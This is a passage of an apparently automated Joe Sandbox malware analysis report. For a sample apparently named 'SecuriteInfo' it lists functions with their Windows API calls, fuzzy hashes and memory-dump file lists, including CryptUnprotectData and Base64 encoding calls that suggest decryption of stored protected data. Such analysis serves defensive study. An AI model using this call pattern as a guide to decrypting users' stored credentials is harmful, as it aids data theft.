                                      • API String ID: 2579439406-0
                                      • Opcode ID: 6377c09b24b4f3199c16a2360b241105b81b23dd4cab541d221f37547fadb70c
                                      • Instruction ID: cf1eefe4f733f5b2c83d718f6bdbbfd4d0fa81adb7c171076d40bca637a8c3a7
                                      • Opcode Fuzzy Hash: 6377c09b24b4f3199c16a2360b241105b81b23dd4cab541d221f37547fadb70c
                                      • Instruction Fuzzy Hash: 3A21F478401204CFD725DFA4FC956883FA4BF2E310F10901AE44997273EBB0598AEF95
                                      Function 00300DF0 Relevance: 6.1, APIs: 4, Instructions: 63memoryencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,00000000,?,?,002F4635,?,?,?,?,?,?), ref: 00300E14
                                      • GetProcessHeap.KERNEL32(00000000,?,?,002F4635,?,?,?,?,?,?), ref: 00300E23
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00300E2A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateBinaryCryptProcessString
                                      • String ID:
                                      • API String ID: 869800140-0
                                      • Opcode ID: 59bc28a420ba069b120c4a59931be87b78d9317a082b40cc46ac17da234f35cc
                                      • Instruction ID: 4e230a4bf50f0b1af5cc03648bb74aa04285761bc83b26acd34f9cc765679b1b
                                      • Opcode Fuzzy Hash: 59bc28a420ba069b120c4a59931be87b78d9317a082b40cc46ac17da234f35cc
                                      • Instruction Fuzzy Hash: 2B113C71201209ABEB10DFA5EC85EAB77ACFF4A321F10055AFD0897240D771AC51DAA0
                                      Function 002F6CD0 Relevance: 6.1, APIs: 4, Instructions: 54encryptionmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,002F5AF2,00000000,00000000), ref: 002F6CF7
                                      • LocalAlloc.KERNEL32(00000040,00000000,?,002F5AF2,00000000,?,?), ref: 002F6D06
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,002F5AF2,00000000,00000000), ref: 002F6D1D
                                      • LocalFree.KERNEL32(?,?,002F5AF2,00000000,?,?), ref: 002F6D2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      • Opcode ID: 9886c82fecb9f3125f667299c6ef3e0857c1dfb2ea167e3ec2def90ba2a3b5ac
                                      • Instruction ID: f4f1a2d4255f682daaa1a6e39fdcfa2a7593a782216fbde19863027b82b9324b
                                      • Opcode Fuzzy Hash: 9886c82fecb9f3125f667299c6ef3e0857c1dfb2ea167e3ec2def90ba2a3b5ac
                                      • Instruction Fuzzy Hash: 55012C723403166BF7304F959C46F66B7ACEF55BA1F280425FB48EA2C0D7B1A8118BA4
                                      Function 0030A130 Relevance: 4.6, APIs: 3, Instructions: 132fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memcpy.MSVCRT(00000000,?,?,?,00000000,?,?,?,0030A775,?,00000000,?,00004000,00000000,00000000,?), ref: 0030A185
                                      • memcpy.MSVCRT(?,?,?,?,00000000,?,?,?,0030A775,?,00000000,?,00004000,00000000,00000000,?), ref: 0030A244
                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,0030A775,?,00000000,?,00004000,00000000), ref: 0030A26A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpy$FileWrite
                                      • String ID:
                                      • API String ID: 3457131274-0
                                      • Opcode ID: 624c92fe13bd2054ffbdbbbf8eca5b1c525281a40635297f676c59b1710cd675
                                      • Instruction ID: fec17a9acd059f10915e74be088f68285009c6c1dff35c5934640f9094796685
                                      • Opcode Fuzzy Hash: 624c92fe13bd2054ffbdbbbf8eca5b1c525281a40635297f676c59b1710cd675
                                      • Instruction Fuzzy Hash: 5141E371611B049BC738DF69E991A67F7F8FF98310F54892EE88A87A40D631F904CB50
                                      Function 0030A440 Relevance: 4.6, APIs: 3, Instructions: 75timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?,?,00000000,?,?,?,0030BE5D,?,?), ref: 0030A49B
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,0030BE5D,?,?), ref: 0030A4A9
                                        • Part of subcall function 00309D30: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,0030BE5D,?,?,?,0030BE5D,?,?), ref: 00309D3E
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0030A4E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 568878067-0
                                      • Opcode ID: ac7adae78e69878d6e8ff85301c7baf670817be22f36fc4995c3d356c6913540
                                      • Instruction ID: 3620b7befca90357c7b826eee879ab0133e2a7e9d1af6b6659230ac905e96829
                                      • Opcode Fuzzy Hash: ac7adae78e69878d6e8ff85301c7baf670817be22f36fc4995c3d356c6913540
                                      • Instruction Fuzzy Hash: D4212AB1900B489FD725DF6DD880AAABBF8FB48304F50892EE59EC7700D770A544CBA4
                                      Function 002F6D50 Relevance: 4.5, APIs: 3, Instructions: 47memoryencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 002F6D75
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 002F6D8D
                                      • LocalFree.KERNEL32(?), ref: 002F6DAE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                      • String ID:
                                      • API String ID: 2068576380-0
                                      • Opcode ID: 881fb81040415a3cb5a66bf37c7ced16f001acfd3065ec87c5d33a37fb5279e4
                                      • Instruction ID: fb2f6053fef04029bc8e94af6e1ab1ad6970e4fb6d259265d82d838380ea8dfe
                                      • Opcode Fuzzy Hash: 881fb81040415a3cb5a66bf37c7ced16f001acfd3065ec87c5d33a37fb5279e4
                                      • Instruction Fuzzy Hash: 97011E79610209ABEB14DFA8DC55FAAB7B9EF88700F144559FA04DB280D771E9018B90
                                      Function 0030ECC8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001EC86), ref: 0030ECCD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 0fa0766d649dd709b332c8470b7f8bbd5c02974f783d2dc3d5713f9220524df3
                                      • Instruction ID: e590d5fdee102096e53b18d6ba7d96ba5c8f0fa399e47b7f17d12718fac48232
                                      • Opcode Fuzzy Hash: 0fa0766d649dd709b332c8470b7f8bbd5c02974f783d2dc3d5713f9220524df3
                                      • Instruction Fuzzy Hash: 499002E035210047A65657B05E1D58525955B4C722B414850E119D4094DE9141849721
                                      Function 00309B30 Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6abe0d754e88d4ea034400bb6dac39f9971c1ac4e2d9a23854e9ca1c342e9395
                                      • Instruction ID: 8a8e0bc30e5f1372c7f620c5ec0e9603d2192651545005937a6b3742196ce81a
                                      • Opcode Fuzzy Hash: 6abe0d754e88d4ea034400bb6dac39f9971c1ac4e2d9a23854e9ca1c342e9395
                                      • Instruction Fuzzy Hash: 562190339794BB01E7428BB2EC5467237E7DBCA305F6F81B5DA4887682D23DE442D220
                                      Function 00309B58 Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc6cb10162a1e0ec64afa14140fa60e9a749ccd3195322d123485548d2d4c17e
                                      • Instruction ID: 68b0c50a4bebb1ccc3c8e3678a362130867fdde78216f19033db12c48351cb93
                                      • Opcode Fuzzy Hash: bc6cb10162a1e0ec64afa14140fa60e9a749ccd3195322d123485548d2d4c17e
                                      • Instruction Fuzzy Hash: 83212C338B94B705E7528BB1AC1467227E3DBDA30AF6F85B5CA8487552D33ED043D211
                                      Function 002F1000 Relevance: .0, Instructions: 29COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
